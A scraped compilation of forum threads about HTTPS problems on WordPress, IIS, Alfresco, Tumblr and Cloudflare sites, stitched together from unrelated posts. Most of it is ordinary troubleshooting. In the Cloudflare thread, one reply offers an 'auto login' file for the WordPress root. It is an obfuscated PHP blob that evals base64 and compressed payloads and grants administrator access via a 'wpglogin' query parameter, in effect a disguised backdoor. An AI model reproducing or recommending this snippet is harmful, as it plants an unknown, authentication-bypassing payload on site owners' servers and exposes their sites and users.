I enabled SLL with the simple SSL plugin on my website https:/www.untwine.eu
All 'sub-sites' and the Wordpress admin pannel are working fine (connection secure). However on my home page there seems to be a problem (attached picture).
I already tried to 'replace all' the http with https.
You seems to have images that goes agains http and not https
check this out
An image with an insecure url of "http://www.untwine.eu/wp-content/uploads/2020/04/background-data-2.jpg" was loaded on line: 828 of https://www.untwine.eu/.
This URL will need to be updated to use a secure URL for your padlock to return.
Related
I have the following scenario. I have a website in IIS 8 and I am trying to secure it (https). I have made the web with web forms. In the process to secure it I have to change the page at the beginning (default page in the IIS administrator). When I do it, I don't get the change and I go to the website that was set by default.
I have seen the log and when trying to access the new homepage it gives an error 302 (object moved). I have seen the response header and I see that the location is configured with the old home page.
Example:
Old default page: www.namedomain.com/start.aspx
New default page: www. namedomain.com/home.aspx
The new website has as in the response header: location = /start.aspx and as I said before when trying to access it gives error 302.
Thanks.
There's a few things going on here, "securing" the site with HTTPS and also potentially <authentication mode="Forms"> in your web.config where it will try and redirect any unauthorised requests to a login page. It seems like you are just doing the HTTPS though at this stage, and maybe trying to set up a redirect from HTTP to HTTPS?
It sounds like you are also trying to change the default page for the website (in IIS or the web.config?) from default.aspx to home.aspx? I'm not sure I understand why you want to do that as it isn't necessary for HTTPS, but the effect of that will mean you can go to https://www.namedomain.com/ and you will get served the content from home.aspx instead of start.aspx (or default.aspx) but the URL will stay as just https://www.namedomain.com/
Normally to set up HTTPS, all you do is go into IIS, Bindings, and add a HTTPS binding (you'll need a TLS certificate to make the https work properly). then just make sure you include the "https://" at the start of your URL.
If you think it might be caching problem on your machine, just add a nonsense querystring to the end of your URL (like https://www.namedomain.com?blah=blahblah) and it will cause your browser to get a fresh copy of the page.
I'm not sure what is causing the 302 redirect, have you added any special code to swap HTTP requests over to HTTPS? Can you update your answer with any more info?
Yes, it is what I put in my last comment Jalpa. I do not understand very well the relationship between not configuring the session variables and the default page but once corrected in code, the application correctly loads the web by default.
I have been trying to enable HTTPS login on alfresco but it seems to be a challenge to get it working.
I can access my website via HTTPS and get the login page, but when I login with the correct credentials I get the following error :
Something's wrong with this page...
We may have hit an error or something might have been removed or deleted, so check that the URL is correct.
Alternatively you might not have permission to view the page (it could be on a private site) or there could have been an internal error. Try checking with your IT team.
If you're trying to get to your home page and it's no longer available you should change it by clicking your name on the toolbar.
I must login in HTTP then refresh my HTTPS page to be connected in HTTPS.
I have already seen what the offical doc says and tested it but it didn't work.
Has anyone an idea on how to fix the problem ?
Thanks
The alfresco.log / catalina.out should tell your more.
Where / how did you set up https? Have a a reverse proxy like nginx or apache in front of the alfresco tomcat?
If the log says something like "CSRF Token Filter issue" then you need to set share.host / port / protocol in alfresco-global.properties as seen from the browser.
I have a static website on which I installed cloudflare flexible SSL.
but now in a folder I installed wordpress here https://www.kiransboutique.com/wordpressrvc/
non of its link is working and wp-admin is also not redirecting to dashboard. I am using correct login credentials.
Can anybody suggest any solution? exactly same installation is working here http://bestcoachingcenter.com/kirans/
To auto login into your wordpress admin , by not adding admin username and password eachtime, you can use below code snippet.
Using this code in a php file and placing it on root directory of your wordpress installation helps you to get login into wp-admin with an administrator account.
What is required to make it work is, you need to hit the url by passing keyword “wpglogin” in query URL as given below –
http://www.sitename.com/codefile.php?wpglogin=YWRtaW4=
By hitting the above URL , you will get entered into admin easily.
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=e044e9d170abfceff3904a363ae1348b68619a68hVRta9swEP7sQv+DFkKllMRpYexDQwKjdSHQbl2S7UsoQrEvsTbF8mQZN5T+9+nFdry1ZQkB5+55Od2dnAJLQBF8LTMNmR6tDjlcIZbngsdMc5mNfxYyw4PJ6Ul/ywU8MJ1OUcJVxvZA+nQZLX5EizVeXi/mDyt6O7+Lvny+j/CjZfAsFmUCVGaxwTb0sDeu8pGQLAnzNO9Z4E7IDROoX+XJxvwFpaSiCnKpNM925MJi/JdvCS8K0MZ6EX37Hi1Xa1zlhr/jmTFFZ2fozQz6MEUYD55PT4J+E0VTtGEFfPpIE4hlAu9oGu/A2HZoRoole5N0ekGfqV1hxJhS7EBsJMBKCsCo+UxnNYMXWjEtFR56WFbuN6Bw4DGXNjiYIC9q8WUBykrvQFP3TJyZqyno2wjliclfuoCt8kjzxXVRneT64nE0S5hmo9n8xpFfnOTvEtTBQPEyuouuV+gc3S6+3iMcutmMZrmCLX8KsS+sSkEBmt9YQtgYhRj78hQUpdC2/JpsT1EHiXdyB2lK9yDBCk3dBrhG4+YYnak1yu4QztVl2mPYn6um0zm6ORDsRzpstdrZWoQ3SiRlsV18YnaA1gTkAF2vOuQHYYBmJWlcKmXukLMjDcU05y8QK3VKYyl/cXiNGY/t2cztglhTLafOzw2NlkqQwSQI6s4eMajgGur0USMXLIZ2J3FVVSF+08NgtOJ7YhaT1jTS8Ie93rCLHbQFGDs/hzYXYnurXa1jtpGltpfbL0Jav2PupH+lXLllUcIsii8Jnrj2tZ1DnMr3dPEk4dD2km2BNjjyHuOob7pzPq53A0QBz/820pznVbv/62Ua0jHw8i9/AA==
Your homepage is still in "hello World" state, so you may still want an answer. I had the same(?) problem; and checked posts like yours on Stackoverflow/Stackexchange - alas no joy.
What worked for me:
If you are using the official Cloudflare plugin ( https://wordpress.org/plugins/cloudflare/ ) set “Automatic HTTPS Rewrites” to “On”. This solved link and CSS issues under HTTPS, and saved me having to install additional SSL related plugins.
As a stop gap: If you have not configured WP to "force SSL" you might be able to login using an "http://" address (as I was).
To enable "HTTPS" login, edit wp-config.php and insert the following line:
if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false)
$_SERVER['HTTPS']='on';
If you want a bit more detail I posted about it here: http://wptest.means.us.com/cloudflare-wordpress-unable-login-https/
Note: Flexible SSL is better than no SSL as it encrypts the "connection" between you and Cloudflare. However, CF's connection to your server is still "HTTP" and your login credentials are STILL vulnerable to eavesdropping on this leg of the journey.
I'm still checking, but I think you can also make the CF <-> Server connection secure by enabling Cloudflare Railgun (used to reduce data transfer from your server). Railgun uses TLS, so data is encrypted. I assume if you use both Flexible SSL and Railgun your connections are secure end to end. Some inexpensive hosts include Railgun for free in their packages.
you can fix Wordpress SSL login problem by entering your server IP to the Windows HOSTS file.
Find Hosts file in windows\system32\hosts add your IP and domain name.
I tried to setup my blog on
http://anshulgarg.me
When I open the link, it opens normally, but after few minutes, when I refresh it, it starts to redirect it at https://anshulgarg.me
My problem is similar to this one:
Force Tumblr to use http link instead of https
What should I do to use http over https on Tumblr?
The problem was with my browser.
I had "HTTPS Everywhere" extension installed which was forcing chrome to use HTTPS over HTTP.
I have spent many days on google with this now, my wordpress problem is this.
I would like to turn on https for a couple of pages on the site for a checkout page and a my-account page.
What i have done so far is tried with htaccess and also tried the wordpress https plugin.
Using wordpress 3.4
What happens is i get blocked content errors, as it is unable to load the css images etc in the template (headway) when in the https page. I can see on chrome inspect element it will show blocked contents error (the css files etc) as they are http not https links
I believe the WordPress Address (URL) should have https in it but not sure as when i do this, the homepage even on http wants to display a certifcate.
This a developement domain so the certificate is not correct yet so just using a server wide cert.
Do i need extra rules in htaccess as i believe wordpress struggles with https from googling around and experiencing every error so far (redirect loop errors etc)
Firewall allows port 443 so not a firewall issue.
Hoping somebody has good knowledge on wordpress https ssl
I thought i would post my answer to my problems with wordpress https for those that maybe stuck like i was for days.
You must when using https on a wordpress have a vaild ssl certificate we bought one from rapidssl for £16 per year.
Without the valid ssl certificate we were constantly getting 310 errors from browswrs like google complaining about redirect loops. Once ssl was installed these went away.
The wordpress site url and wordpress home link did not have to be changed from http at all.
Using the wordpress https plugin for the secure pages that we needed, ticked the boxes in edit page to force ssl and with everything ticked in https settings except admin ssl login.
We then after installing the certificate got security warnings and errors about partially encrypted content which means in your secure page there are some http links that the browser does not like.
What we then did was using chrome inspect the element of the page and click on the console tab to find these http links. In our case there were 3 images which in the headway theme i had to insert as a https:// url (url of image) in the header or media boxes in the grid (for those of you using headway).
We also had a link from google web fonts that had to be made https in the secure pages
once that was secure our errors went away. Eg in firefox only the padlock displays.
If you then have a return url set in paypal which gives you a partially encrypted message like this - Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could be easily read by a third party - the page which you are returning to has to have a padlock in the https if not you will keep getting this error from firefox etc. So return page has to be no errors, best way is to have a thankyou page with no calls to images etc but the just the order details etc.
One thing that has been driving me nuts was that the call to google we fonts was being affected by headway cache so it was sticking to http sometimes in the https page causing an error, so disabled that now, just off to post a question about making a plugin to disable wordpress headway theme cache on ssl pages see if any can help me on that.
Good luck with your ssl pages folks its great fun!!!!!!!!
oh and heres javascriipt i use for google fonts if anyone wants it for the header
<script type="text/javascript">
WebFontConfig = {
google: { families: [ 'Lato:300,400,700' ] }
};
(function() {
var wf = document.createElement('script');
wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
'://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
wf.type = 'text/javascript';
wf.async = 'true';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wf, s);
})();
</script>
but there are other ways of calling it in https using // instead of http:// google bla is another
I can see on chrome inspect element it will show blocked contents
error (the css files etc) as they are http not https links I believe
the WordPress Address (URL) should have https in it but not sure as
when i do this, the homepage even on http wants to display a
certifcate.
That’s the answer. ssl protected webpages delivering content need to have 100% all of their content delivered via https. Maybe 10 years ago mixed https/http pages existed, but nowadays browsers are extra security aware. So you need to figure out how to make sure all content has URLs set with https. This site seems to have a decent set of answers.